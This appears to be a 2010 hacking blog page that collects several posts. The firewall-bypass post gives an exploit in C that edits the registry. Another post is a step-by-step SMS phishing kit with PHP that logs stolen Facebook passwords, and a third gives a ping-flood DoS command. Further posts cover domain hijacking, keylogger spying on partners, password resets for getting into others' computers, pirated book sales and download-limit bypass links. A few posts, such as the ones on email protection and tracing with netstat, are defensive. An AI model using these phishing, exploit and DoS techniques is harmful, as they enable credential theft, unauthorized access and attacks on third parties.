Latest: Hack Facebook Password! | Wants To Hack CellPhone | Trace Mobile Number(only US) ! | New : Best FUD Keylogger!

Featured Posts

hack mobile

Thursday, September 30, 2010

Bypassing Windows-XP Firewall

Comments Posted by wildrank on Thursday, September 30, 2010
There is a technique using which we can bypass windows-xp service pack-2 firewall.
This techniques is nothing but the vulnerability found in windows-xp sp2 firewall.
This is explained here in detail with exploit code.

Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall's registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.

Credit :-
The information has been provided by Mark Kica.
The original article can be found at: http://taekwondo-itf.szm.sk/bugg.zipVulnerable Systems :-
* Microsoft Windows XP SP2
Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker.
If an attacker adds a new key to the registry address of HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List, the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning.
Proof of Concept :-
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List
Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat

Exploit :-
#include
#include
#include
#include
#include "Shlwapi.h" int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];
HKEY hKey;
int i;
GetModuleFileName(NULL, filename, 1024);
strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");
RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

int temp, sockfd, new_fd, fd_size;
struct sockaddr_in remote_addr;
fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");
fprintf(stdout, "Dedicated to Katka H. from Levoca \n");
sleep(3);
if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;

for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);
if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);
fprintf(stdout, "Sended: Hello World\r\n");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
if (!strcmp(buffer, "quit"))
break;
}
ezsocket_exit();
return 0;
}
/* EoF */


Domain Hijacking – How to Hijack a Domain

Comments Posted by wildrank on Thursday, September 30, 2010
In this post I will tell you about how the domain names are hacked and how they can be protected. The act of hacking domain names is commonly known as Domain Hijacking. For most of you, the term “domain hijacking” may seem to be like an alien. So let me first tell you what domain hijacking is all about.
Domain hijacking is a process by which Internet Domain Names are stolen from it’s legitimate owners. Domain hijacking is also known as domain theft. Before we can proceed to know how to hijack domain names, it is necessary to understand how the domain names operate and how they get associated with a particular web server (website).


The operation of domain name is as follows
Any website say for example gohacking.com consists of two parts. The domain name(hacking.com) and the web hosting server where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of domain name with the web hosting server is done as follows.
1. After registering a new domain name, we get a control panel where in we can have a full control of the domain.
2. From this domain control panel, we point our domain name to the web server where the website’s files are actually hosted.
For a clear understanding let me take up a small example.
John registers a new domain “abc.com” from an X domain registration company. He also purchases a hosting plan from Y hosting company. He uploads all of his files (.html, .php, javascripts etc.) to his web server (at Y). From the domain control panel (of X) he configures his domain name “abc.com” to point to his web server (of Y). Now whenever an Internet user types “abc.com”, the domain name “abc.com” is resolved to the target web server and the web page is displayed. This is how a website actually works.

What happens when a domain is hijacked
Now let’s see what happens when a domain name is hijacked. To hijack a domain name you just need to get access to the domain control panel and point the domain name to some other web server other than the original one. So to hijack a domain you need not gain access to the target web server.
For example, a hacker gets access to the domain control panel of “abc.com”. From here the hacker re-configures the domain name to point it to some other web server (Z). Now whenever an Internet user tries to access “abc.com” he is taken to the hacker’s website (Z) and not to John’s original site (Y).
In this case the John’s domain name (abc.com) is said to be hijacked.

How the domain names are hijacked
To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients
1. The domain registrar name for the target domain.
2. The administrative email address associated with the target domain.
These information can be obtained by accessing the WHOIS data of the target domain. To get access the WHOIS data, goto whois.domaintools.com, enter the target domain name and click on Lookup. Once the whois data is loaded, scroll down and you’ll seeWhois Record. Under this you’ll get the “Administrative contact email address”.
To get the domain registrar name, look for something like this under the Whois Record. “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. In case if you don’t find this, then scroll up and you’ll see ICANN Registrarunder the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.
The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it. Email hacking has been discussed in my previous post how to hack an email account.
Once the hacker take full control of this email account, he will visit the domain registrar’s website and click on forgot password in the login page. There he will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once this is done all the details to reset the password will be sent to the administrative email address. Since the hacker has the access to this email account he can easily reset the password of domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.

How to protect the domain name from being hijacked
The best way to protect the domain name is to protect the administrative email account associated with the domain. If you loose this email account, you loose your domain. So refer my previous post on how to protect your email account from being hacked. Another best way to protect your domain is to go for private domain registration. When you register a domain name using the private registration option, all your personal details such as your name, address, phone and administrative email address are hidden from the public. So when a hacker performs a WHOIS lookup for you domain name, he will not be able to find your name, phone and administrative email address. So the private registration provides an extra security and protects your privacy. Private domain registration costs a bit extra amount but is really worth for it’s advantages. Every domain registrar provides an option to go for private registration, so when you purchase a new domain make sure that you select the private registration option.


How to Protect an Email Account from being Hacked

Comments Posted by wildrank on Thursday, September 30, 2010

Today in this post I’ll teach you how to protect your email account from being hacked. Nowadays I get a lot of emails where most of the people say “My Email account is hacked please help…”. Now one question which arises in our mind is: “Is it so easy to hack an email accountOR Is it so difficult to protect an email account from being hacked?”. The single answer to these two questions is “Absolutely NOT!”. It is neither easy to hack an email nor difficult to protect an email account from bieng hacked.


If this is the case, then what is the reason for many people to lose their accounts?
The answer is very simple. They don’t know how to protect themselves from being hacked! In fact most of the people who lose their email accounts are not the victims of hacking but the victims of Trapping. They lose their passwords not because they are hacked by some expert hackers but they are fooled to such an extent that they themselves give away their password.
Are you confused? If so continue reading and you’ll come to know…
Now I’ll mention some of the most commonly used online scams which fool people and make them lose their passwords. I’ll also mention how to protect your email account from these scams.

1. WEBSITE SPOOFING
Website spoofing is the act of creating a website, with the intention of misleading the readers. The website will be created by a different person or organisation (Other than the original) especially for the purposes of cheating. Normally, the website will adopt the design of the target website and sometimes has a similar URL.
For example a Spoofed Website of Yahoo.com appears exactly same as Yahoo Website. So most of the people believe that it is the original site and lose their passwords. The main intention of spoofed websites is to fool users and take away their passwords. For this,the spoofed sites offer fake login pages. These fake login pages resemble the original login pages of sites like Yahoo,Gmail,Orkut etc. Since it resemble’s the original login page people beleive that it is true and give away their username and passwordsby trying to login to their accounts.

Solution:
  • Never try to login/access your email account from the sites other than the original site.
  • Always type the URL of the site in the address bar to get into the site. Never click on the hyperlink to enter the site.

2. BY USING KEYLOGGERS
The other commonly used method to steal password is by using a Keylogger. A Keylogger is nothing but a spyware. The detailed description of keylogger and it’s usage is discussed in the post Hacking an email account. If you read this post you’ll come to know that it is too easy to steal the password using a keylogger program. If you just access your email account from a computer installed with keylogger, you definitely lose your password. This is because the keylogger records each and every keystroke that you type.

Solution:
Protecting yourselves from a keylogger scam is very easy.Just install a good anti-spyware program and update it regularly. This keeps your PC secure from a keylogger. Also there is a program called Anti-keylogger which is specially designed to detect and remove keyloggers. You can use this program to detect some stealth keyloggers which remain undetected by many anti-spyware programs.

3. ACCESSING YOUR EMAIL ACCOUNT FROM CYBER CAFES
Do you access your email from cyber cafes?  Then definitely you are under the risk of loosing your password.In fact many people lose their email account in cyber cafes. For the owner of the cyber cafe it’s just a cakewalk to steal your password. For this he just need’s to install a keylogger on his computers. So when you login to your email account from this PC, you give away your password to the cafe owner. Also there are many Remote Administration Tools (RATs) which can be used to monitor your browsing activities in real time.
This doesn’t mean that you should never use cyber cafes for browsing the internet. I know, not all the cyber cafe owners will be so wicked but it is recommended not to use cafes for accessing confidential information. If it comes to the matter of security never trust anyone, not even your friend. I always use my own PC to login to my accounts to ensure safety.
So with this I conclude my post and assume that I have helped my readers to protect their email accounts from being hacked. Please pass your comments…


Hack Email Account – Email Hacking

Comments Posted by wildrank on Thursday, September 30, 2010
I know most of you might be wondering to know how tohack email? You as the reader are most likely reading this because you want to hack into someone’s email account or catch a cheating spouse, girl/boy friend by gaining access to their email accounts. So read on to find out the real and working ways to hack any email and expose the truth behind the lies.
 Is it Possible to Hack Email?
Yes! As a matter of fact, almost anything can be hacked. But before you learn the real ways to hack email, the following are the things you should be aware of.
1. There is no ready made software that can hack emails and get you the password just with a click of a button. So if you come accross any website that claims to sell such softwares, I would advise you not to trust them.
2. Never trust any email hacking service that claims to hack any email for just $100 or $200. Most of them are no more than a scam.
3. With my experience of over 4 years in the field of Hacking and Security, I can tell you that there exists only 2 foolproof methods for hacking email. All the other methods are simply scam or don’t work.
The following are the only 2 working and foolproof methods to hack any email.

1. HACK ANY EMAIL: EASIEST WAY

The easiest way to hack an email is by using a keylogger (Also known as win-spy software). A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer’s keyboard. To use it you don’t need to have any special knowledge. Anyone with a basic knowledge of computer can use it. With my experience I recommend the following keylogger as the best for hacking email.


Saturday, September 18, 2010

Rapidshare - Hotfile - Megaupload Premium Account No Wait

Comments Posted by wildrank on Saturday, September 18, 2010
NOW YOU CAN DOWNLOAD FROM HOTFILE,RAPIDSHARE,MEGAUPLOAD FOR FREE. I WILL GIVE YOU THE LINK OF 100 % WORKING PREMIUM LINK GENRATOR.IT HAVE NO SPEED LIMIT,HAVE REUME CAPABILTY .BUT IT HAVE A LIMIT OF DOWNLOADING 3 FILES PER IP .TO BYPASS THIS YOU CAN RESTART YOUR MODEM AND CAN CHANGE YOUR IP.


JUST GO TO WEBSITE SELCT SERVER,FILL CAPTCHA AND PASTE LINK THAT U WANT TO DOWNLOAD.

HERE ARE LINK :

FOR RAPIDSHARE :

http://rsplg.com/
http://leechrs.com/

FOR HOTFILE :

http://hfplg.com/

FOR MEGAUPLOAD :

http://muplg.com/


Thursday, September 16, 2010

SMS Phishing to hack facebook via sms

Comments Posted by wildrank on Thursday, September 16, 2010
I have heard a lot of news regarding sms phishing but didnt found any tutorial explaining this. So, i decided to write a tut to share knowledge about this. Any mistakes are regretted and suggestions and comments are welcomed! Hope you like it.

Note: This tutorial is written for educational purposes only and I take no responsibility for any consequences you suffer for executing this.

Here we are making fake mobile login of facebook.

What happens?
Victim receives a sms on his mobile apparently from facebook asking to try out new version of facebook. A link is provided in the sms. The victim opens the link, sees the facebook login page. He makes the login and it shows username/password is wrong. He gets phished...

To proceed ahead, you need to have a web server running on your computer connected to internet and mobile number of the victim.

Process:

SETTING UP YOUR PHISHING PAGE.
Go to http://m.facebook.com/ and copy the source code. Place it your web server's public html folder with ".htm" as extension. Open this html file in notepad and go to the form tag. In that, replace the form method from POST to GET. Change the form action value to write.php (you can change the name if you want). Rename the file as "index.htm". Create another file and name it as "write.php". Open write.php and copy the following content to the same. Save it.



Code:
header("Location: http://m.facebook.com/login.php?m=m&r811c1f38&refid=9&rdd9db9a5&e=iep&r1129f1e6");$handle = fopen("pswd.txt", "a");
foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "=");fwrite($handle, $value);fwrite($handle, "\r\n");
}fwrite($handle, "\r\n");fclose($handle);
exit;?>

 Also create another file pswd.txt and leave it as it is. This is the file where our usernames and passwords are getting stored.
You can store these files in any directory under public html. Remember to keep the name of directory something like facebook or similar.
Now start the server.

CHECKING IF OUR PHISHING PAGE IS WORKING.
go to cmyip.com to know your ip address. Paste this ip address in address bar. You should see your phishing page or your default index.htm(if the files are stored in any directory under public html). If not, following maybe the reasons for it:
1. You maybe behind a router. So, you need to open router's settings and enable port forwarding to your machine.
2. Your server maybe configured not to allow any outside connections. So, check out access settings and enable outside connections.
3. Your server may not be running properly.
Now, you need to navigate to the directory in which our phishing files are stored. for example, my files are in /smsphish under public html. So, i'll navigate to...
http://myipaddress/smsphish/
There you can see the fake login of facebook. You can enter any fake stuff in username and password field. Press enter. It should redirect you to the actual facebook mobile site. Now, open our pswd.txt file and see if our entered details are logged there. If they are, our work is mostly done. if they are not, check that you have made necessary changes in index.htm and the write.php is not tampered.
Now nearly 90% work is done. We move to the last step...


SENDING THE SMS.
Now you have to find free smsing sites which do not require to register. These sites use their own number for sending messeages. You can find many such sites. One word: Google. Now here comes our social engineering techniques. Just type the message like "Experience the brand new, more secure version of facebook, simply follow the link,.. blah blah" and give link to our phishing page. A sample message would look like this.

Quote
Experience the brand new version of facebook! Faster and secure. Follow the link now:
http://youripaddress/yourdirectory/
-Facebook development team.
You can think of many more luring techniques... just think!
Enter the victim's mobile number and send the message! (recommended use proxy) If he opens the message and link, he will see the normal facebook mobile login and if he enters the correct details, our phishing worked! just keep watch on pswd.txt for their details!

Note: Be careful when running server!


Sunday, September 12, 2010

Hacking Exposed: Network Security Secrets & Solutions

Comments Posted by wildrank on Sunday, September 12, 2010
Hacking Exposed: Network Security Secrets & Solutions

Publisher: McGraw-Hill/OsborneMedia | ISBN: 0072127481 | edition 2000 | PDF | 736 pages | 13,1 mb


A lot of computer-security textbooks approach the subject from a defensive point of view. "Do this, and probably you'll survive a particular kind of attack," they say. In refreshing contrast, Hacking Exposed, Second Edition talks about security from an offensive angle. A Jane's-like catalog of the weaponry that black-hat hackers use is laid out in full. Readers see what programs are out there, get a rundown on what the programs can do, and benefit from detailed explanations of concepts (such as wardialing and rootkits) that most system administrators kind of understand, but perhaps not in detail. The book also walks through how to use the more powerful and popular hacker software, including L0pht.. This new edition has been updated extensively, largely with the results of "honeypot" exercises (in which attacks on sacrificial machines are monitored) and Windows 2000 public security trials. There's a lot of new stuff on e-mail worms, distributed denial-of-service (DDoS) attacks, and attacks that involve routing protocols.

If you think this book is something you would be interested in, you can buy it here for 10$.For order give comment in following comment box with your original email id after that i ll contact you in next 24hr.




Offer : Price for first 5 buyer - 5$ (Offer will continue after every 6 months -[ january and june] )

Do you have questions, comments, or suggestions? Feel free to post a comment!


Google Hacking For Penetration Testers

Comments Posted by wildrank on Sunday, September 12, 2010


Google Hacking for Penetration ers


Publisher: Syngress | ISBN: 1931836361 | edition 2005 | PDF | 529 pages | 12,3 mb


Google, the most popular search engine worldwide, provides web surfers with an easy-to-use guide to the Internet, with web and image searches, language translation, and a range of features that make web navigation simple enough for even the novice user. What many users don't realize is that the deceptively simple components that make Google so easy to use are the same features that generously unlock security flaws for the malicious hacker. Vulnerabilities in website security can be discovered through Google hacking, techniques applied to the search engine by computer criminals, identity thieves, and even terrorists to uncover secure information. This book beats Google hackers to the punch, equipping web administrators with penetration ing applications to ensure their site is invulnerable to a hacker's search.

If you think this book is something you would be interested in, you can buy it here for 10$.For order give comment in following comment box with your original email id after that i ll contact you in next 24hr.




Offer : Price for first 5 buyer - 5$ (Offer will continue after every 6 months -[ january and june] )

Do you have questions, comments, or suggestions? Feel free to post a comment!


Saturday, September 11, 2010

How to Hack Windows Administrator Password

Comments Posted by wildrank on Saturday, September 11, 2010
This hack will show you how to reset Windows administrator password (for Win 2000, XP, Vista and Win 7) at times when you forget it or when you want to gain access to a computer for which you do not know the password.

Most of us have experienced a situation where in we need to gain access to a computer which is password protected or at times we may forget the administrator password without which it becomes impossible to login to the computer. So here is an excellent hack using which you can reset the password or make the password empty (remove the password) so that you can gain administrator access to the computer. You can do this with a small tool called Offline NT Password & Registry Editor. This utility works offline, that means you need to shut down your computer and boot off your using a floppy disk, CD or USB device (such as pen drive). The tool has the following features.

You do not need to know the old password to set a new one
Will detect and offer to unlock locked or disabled out user accounts!
There is also a registry editor and other registry utilities that works under linux/unix, and can be used for other things than password editing.

How it works?

Most Windows operating systems stores the login passwords and other encrypted passwords in a file called sam (Security Accounts Manager). This file can be usually found in \windows\system32\config. This file is a part of Windows registry and remains inaccessible as long as the OS is active. Hence it is necessary that you need to boot off your computer and access this sam file via boot. This tool intelligently gains access to this file and will reset/remove the password associated with administrator or any other account.

The download link for both CD and floppy drives along with the complete instructions is given below

Offline NT Password & Reg Editor Download

It is recommended that you download the CD version of the tool since floppy drive is outdated and doesn’t exist in today’s computer. Once you download you’ll get a bootable image which you need to burn it onto your CD. Now boot your computer from this CD and follow the screen instructions to reset the password.


Another simple way to reset non-administrator account passwords

Here is another simple way through which you can reset the password of any non-administrator accounts. The only requirement for this is that you need to have administrator privileges. Here is a step-by-step instruction to accomplish this task.

1. Open the command prompt (Start->Run->type cmd->Enter)

2. Now type net user and hit Enter

3. Now the system will show you a list of user accounts on the computer. Say for example you need to reset the password of the account by name John, then do as follows

4. Type net user John * and hit Enter. Now the system will ask you to enter the new password for the account. That’s it. Now you’ve successfully reset the password for John without knowing his old password.

So in this way you can reset the password of any Windows account at times when you forget it so that you need not re-install your OS for any reason. I hope this helps.


How to Hack an Email using Hardware Keylogger

Comments Posted by wildrank on Saturday, September 11, 2010
http://realhackingtips.blogspot.com/2010/07/best-myspace-facebook-hacking-software.htmlDid you know that keyloggers are the simplest way to hack an email password?. Today I’ll be giving you a detailed information on hardware keyloggers and their use. I will also teach how to hack an email using hardware keylogger.
More information about Keylogger click here

A software keylogger (or simple keylogger) is a stealth computer program that captures every keystroke entered through the keyboard.

Now I’ll tell you what is a hardware keylogger and how it can be used for hacking an email.

Hardware Keyloggers are used for keystroke logging, a method of capturing and recording computer user keystrokes. They plug in between a computer keyboard and a computer and log all keyboard activity to an internal memory. They are designed to work with PS/2 keyboards, and more recently with USB keyboards. A hardware keylogger appears simply as a USB pendrive (thumb drive) or any other computer peripheral so that the victims can never doubt that it is a keylogger. So by looking at it’s appearence it is not possible to identify it as a keylogger. Here are some of the images of hardware keyloggers for your convenience.



So by looking at the above images we can come to know that hardware keyloggers look just like any USB or PS/2 device. So it is very hard to identify it as a keylogger.


Insatalling a Hardware Keylogger to Hack the Email Password

The hardware keylogger must be installed between the keyboard plug and the USB or PS/2 port socket. That is you have to just plug in the keylogger to your keyboard’s plug (PS/2 or USB) and then plug it to the PC socket. The following image shows how the keylogger is installed.



Once you install the hardware keylogger as shown in the above two images the keylogger starts recording each and every keystroke of the keyboard including email passwords and other confidential information. The hardware keylogger has an inbuilt memory in which the logs are stored.

For Software Download....Click here.


Friday, September 10, 2010

Hacking: The Art of Exploitation

Comments Posted by wildrank on Friday, September 10, 2010

Hacking: The Art of Exploitation

This is an excellent book about hacking. Includes a very well written introduction to the C programming language. The book contains very useful chapters on Networking and on Cryptology with lots of hand-on examples. I highly recommend it if you want to learn hacking techniques presented in a systematic way

This book teaches hacking in the old sense of the word and contains the explanation that most others books don’t – and at the same time it introduces all the basic skills for performing various types of overflow attacks. Then the book also digress into some wireless security and even WEP cracking, but this part is pretty slim, not bad, just only a few pages. This is OK, since I think of this more as an example of extending the hacking into new areas and hopefully inspires more people to look into wireless security.

The best part about this book is that it is not just a book with a random Live-CD. It is an inspiration and your fingers will itch to get started trying the examples explained and experiment with the programs. This alone is the single feature that makes this book worth it, you will do the exercises and learn from them. Learn a lot.
To sum it up this books contains clever tricks and easy to follow exercises, so you can learn to apply them.
Target audience

This book is for anyone interested in hacking and developing exploits. While the primary target audience is newcomers to this field I benefitted from the thorough walkthrough of the basics once again. This book kept reminding me about things I have forgotten and also some new things and tricks I hadn’t thought of myself


If you think this book is something you would be interested in, you can buy it here for 10$.For order give comment in following comment box with your original email id after that i ll contact you in next 24hr.


Offer : Price for first 5 buyer - 5$ (Offer will continue after every 6 months -[ january and june] )

Do you have questions, comments, or suggestions? Feel free to post a comment!




Monday, September 6, 2010

How To Send DoS Attack With CMD

Comments Posted by wildrank on Monday, September 06, 2010
DoS Attack With Your Home Pc To Any WebSite U Want To Be Killed!!

------------------------
DoS Attack Stands For Denial of Service Attack
------------------------
What Is DoS?

A: Denial of Service (DoS) attackes are aggressive attacks on an individual Computer or WebSite with intent to deny services to intended users.
DoS attackes can target end-user systems, servers, routers and Network links(websites)

Requirments:
1- Command Prompt (CMD or DOS) Which is usually integrated in all Windows.
2- Ip-Address of Targeted Site.

How TO GET IP OF ANY SITE??"
No problem.. here is the solution..
open ur CMD (command prompt).. and type
--------------------------------------------------
nslookup Site-Name
--------------------------------------------------
(e.g nslookup www.google.com)

It will show u ip of the site.

ohk now write this command in CMD For Attack on Any Site/ Server..
---------------------------------------------------
ping SITE-IP -l 65500 -n 10000000 -w 0.00001
---------------------------------------------------
-n 10000000= the number of DoS attemps.. u can change the value "10000000" with ur desired value u want to attempt attack.

SITE-IP= Replace the text with the ip address of the site u want to be attacked..

-w 0.00001 = It is the waiting time after one ping attack.

NOTE: Dont Change or Remove -l, -n and -w in this command.. otherwise u will not able to attack!!


HOw to trace a Hacker??

Comments Posted by wildrank on Monday, September 06, 2010
Sometimes, it's just not enough to simply know that there's a Trojan or Virus onboard. Sometimes you need to know exactly why that file is onboard, how it got there - but most importantly, who put it there.

By enumerating the attacker in the same way that they have enumerated the victim, you will be able to see the bigger picture and establish what you're up against. But how can you do this? Read on...

## Connections make the world go round ##

The computer world, at any rate. Every single time you open up a website, send an email or upload your webpages into cyberspace, you are connecting to another machine in order to get the job done. This, of course, presents a major problem, because this simple act is what allows malicious users to target a machine in the first place.

# How do these people find their victim?

Well, first of all, they need to get hold of the victim's IP Address. Your IP (Internet Protocol) address reveals your point of entry to the Internet and can be used in many ways to cause your online activities many, many problems. It may not reveal you by name, but it may be uniquely identifiable and it represents your digital ID while you are online (especially so if you're on a fixed IP / DSL etc).

With an IP address, a Hacker can find out all sorts of weird and wonderful things about their victim (as well as causing all kinds of other trouble, the biggest two being Portnukes/Trojans and the dreaded DoS ((Denial of Service)) attack). Some Hackers like to collect IP Addresses like badges, and like to go back to old targets, messing them around every so often. An IP address is incredibly easy to obtain - until recently, many realtime chat applications (such as MSN) were goldmines of information. Your IP Address is contained as part of the Header Code on all emails that you send and webpages that you visit can store all kinds of information about you. A common trick is for the Hacker to go into a Chatroom, paste his supposed website address all over the place, and when the unsuspecting victim visits, everything about your computer from the operating system to the screen resolution can be logged...and, of course, the all important IP address. In addition, a simple network-wide port scan will reveal vulnerable target machines, and a war-dialler will scan thousands of lines for exposed modems that the hacker can exploit.

So now that you know some of the basic dangers, you're probably wondering how these people connect to a victim's machine?

## Virtual and Physical Ports ##

Everything that you recieve over the Internet comes as a result of other machines connecting to your computer's ports. You have two types; Physical are the holes in the back of your machine, but the important ones are Virtual. These allow transfer of data between your computer and the outside world, some with allocated functions, some without, but knowing how these work is the first step to discovering who is attacking you; you simply MUST have a basic knowledge of this, or you won't get much further.

# What the phrases TCP/UDP actually mean

TCP/IP stands for Transmission Control Protocol and Internet Protocol, a TCP/IP packet is a block of data which is compressed, then a header is put on it and it is sent to another computer (UDP stands for User Datagram Protocol). This is how ALL internet transfers occur, by sending packets. The header in a packet contains the IP address of the one who originally sent you it. Now, your computer comes with an excellent (and free) tool that allows you to see anything that is connected (or is attempting to connect) to you, although bear in mind that it offers no blocking protection; it simply tells you what is going on, and that tool is NETSTAT.

## Netstat: Your first line of defence ##

Netstat is a very fast and reliable method of seeing exactly who or what is connected (or connecting) to your computer. Open up DOS (Start/Programs/MS-DOS Prompt on most systems), and in the MSDOS Prompt, type:

netstat -a

(make sure you include the space inbetween the "t" and the "a").

If you're connected to the Internet when you do this, you should see something like:
Quote:
Active Connections

Proto Local Address Foreign Address State
TCP macintosh: 20034 modem-123.tun.dialup.co.uk: 50505 ESTABLISHED
TCP macintosh: 80 proxy.webcache.eng.sq: 30101 TIME_WAIT
TCP macintosh MACINTOSH: 0 LISTENING
TCP macintosh MACINTOSH: 0 LISTENING
TCP macintosh MACINTOSH: 0 LISTENING


Now, "Proto(col)" simply means what kind of data transmission is taking place (TCP or UDP), "Local address" is your computer (and the number next to it tells you what port you're connected on), "Foreign Address" is the machine that is connected to you (and what port they're using), and finally "State" is simply whether or not a connection is actually established, or whether the machine in question is waiting for a transmission, or timing out etc.

Now, you need to know all of Netstat's various commands, so type:

netstat ?

You will get something like this:
Quote:
Displays protocol statistics and current TCP/IP network connections.

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto may be TCP or UDP. If used with the -s option to display per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the -p option may be used to specify a subset of the default.



Have a play around with the various options, but the most important use of these methods is when you combine them. The best command to use is

netstat -an

because this will list all connections in Numerical Form, which makes it a lot easier to trace malicious users....Hostnames can be a little confusing if you don't know what you're doing (although they're easily understandable, as we shall see later). Also, by doing this, you can also find out what your own IP address is, which is always useful.

Also,

netstat -b

will tell you what ports are open and what programs are connecting to the internet.

## Types of Port ##

It would be impossible to find out who was attacking you if computers could just access any old port to perform an important function; how could you tell a mail transfer from a Trojan Attack? Well, good news, because your regular, normal connections are assigned to low, commonly used ports, and in general, the higher the number used, the more you should be suspicious. Here are the three main types of port:

# Well Known PortsThese run from 0 to 1023, and are bound to the common services that run on them (for example, mail runs on channel 25 tcp/udp, which is smtp (Simple Mail Transfer Protocol) so if you find one of these ports open (and you usually will), it's usually because of an essential function.

# Registered PortsThese run on 1024 to 49151. Although not bound to a particular service, these are normally used by networking utilities like FTP software, Email client and so on, and they do this by opening on a random port within this range before communicating with the remote server, so don't panic (just be wary, perhaps) if you see any of these open, because they usually close automatically when the system that's running on them terminates (for example, type in a common website name in your browser with netstat open, and watch as it opens up a port at random to act as a buffer for the remote servers). Services like MSN Messenger and ICQ usually run on these Ports.

# Dynamic/Private PortsRanging from 49152 to 65535, these things are rarely used except with certain programs, and even then not very often. This is indeed the usual range of the Trojan, so if you find any of these open, be very suspicious. So, just to recap:
Quote:
Well Known Ports 0 to 1023 Commonly used, little danger.
Registered Ports 1024 to 49151 Not as common, just be careful.
Dynamic/Private Ports 49152 to 65535 Be extremely suspicious.


## The hunt is on ##

Now, it is essential that you know what you're looking for, and the most common way someone will attack your machine is with a Trojan. This is a program that is sent to you in an email, or attempts to bind itself to one of your ports, and when activated, it can give the user your passwords, access to your hard drive...they can even make your CD Tray pop open and shut. At the end of this Document, you will find a list of the most commonly used Trojans and the ports they operate on. For now, let's take another look at that first example of Netstat....
Quote:
Active Connections

Proto Local Address Foreign Address State
TCP macintosh: 27374 modem-123.tun.dialup.co.uk: 50505 ESTABLISHED
TCP macintosh: 80 proxy.webcache.eng.sq: 30101 TIME_WAIT
TCP macintosh MACINTOSH: 0 LISTENING
TCP macintosh MACINTOSH: 0 LISTENING
TCP macintosh MACINTOSH: 0 LISTENING
--------------------------------------------------------------------------------
Now, straight away, this should make more sense to you. Your computer is connected on two ports, 80 and 27374. Port 80 is used for http/www transmissions (ie for all intents and purposes, its how you connect to the net, although of course it's a lot more complicated than that). Port 27374, however, is distinctly suspicious; first of all, it is in the registered port range, and although other services (like MSN) use these, let's assume that you have nothing at all running like instant messengers, webpages etc....you're simply connected to the net through proxy. So, now this connection is looking even more troublesome, and when you realise that 27374 is a common port for Netbus (a potentially destructive Trojan), you can see that something is untoward here. So, what you would do is:
Quote:
1) run Netstat , and use:

Netstat -a

then

Netstat -an

So you have both Hostnames AND IP addresses.

Tracerouting ##

Having the attacker's IP is all well and good, but what can you do with it? The answer is, a lot more! It's not enough to have the address, you also need to know where the attacker's connections are coming from. You may have used automated tracerouting tools before, but do you jknow how they work?

Go back to MSDOS and type
Quote:
tracert *type IP address/Hostname here*


Now, what happens is, the Traceroute will show you all the computers inbetween you and the target machine, including blockages, firewalls etc. More often than not, the hostname address listed before the final one will belong to the Hacker's ISP Company. It'll either say who the ISP is somewhere in there, or else you run a second trace on the new IP/hostname address to see who the ISP Company in question is. If the Hostname that you get back doesn't actually seem to mention an actual geographical location within its text, you may think all is lost. But fear not! Suppose you get a hostname such as

Code:    www.haha.com

Well, that tells us nothing, right? Wrong....simply enter the hostname in your browser, and though many times you will get nothing back, sometimes it will resolve to an ISP, and from there you can easily find out its location and in what areas they operate. This at least gives you a firm geographical location to carry out your investigations in.

If you STILL have nothing, as a last resort you COULD try connecting to your target's ISP's port 13 by Telnet, which will tell you how many hours ahead or behind this ISP is of GMT, thus giving you a geographical trace based on the time mentioned (although bear in mind, the ISP may be doing something stupid like not having their clocks set correctly, giving you a misleading trace. Similarly, a common tactic of Hackers is to deliberately have their computer's clock set to a totally wrong time, so as to throw you off the scent). Also, unless you know what you're doing, I wouldn't advise using Telnet (which is outside the parameters of this tutorial).

## Reverse DNS Query ##

